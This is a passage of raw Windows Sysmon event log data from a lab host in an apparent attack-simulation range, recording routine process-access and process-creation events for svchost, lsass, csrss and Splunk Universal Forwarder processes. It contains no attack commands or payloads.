Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005275Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005274Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005273Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005272Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005271Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005270Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005269Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005268Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005267Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005266Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CDA-5FA1-1401-000000008801}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005265Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.996{D28789B6-7CDA-5FA1-1301-000000008801}35483628C:\Windows\system32\cmd.exe{D28789B6-7CDA-5FA1-1401-000000008801}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005264Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:58.999{D28789B6-7CDA-5FA1-1401-000000008801}3996C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{D28789B6-7CDA-5FA1-1301-000000008801}3548C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000005534Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.955{D28789B6-7C62-5FA1-0B00-000000008801}86892C:\Windows\system32\lsass.exe{D28789B6-7CDE-5FA1-2101-000000008801}3184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005533Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.955{D28789B6-7C62-5FA1-0B00-000000008801}86892C:\Windows\system32\lsass.exe{D28789B6-7CDE-5FA1-2101-000000008801}3184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005532Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDE-5FA1-2401-000000008801}4044C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005531Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005530Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005529Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005528Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005527Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005526Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005525Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005524Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005523Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005522Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CDE-5FA1-2401-000000008801}4044C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005521Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.940{D28789B6-7CDE-5FA1-2301-000000008801}35642604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7CDE-5FA1-2401-000000008801}4044C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005520Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.951{D28789B6-7CDE-5FA1-2401-000000008801}4044C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT 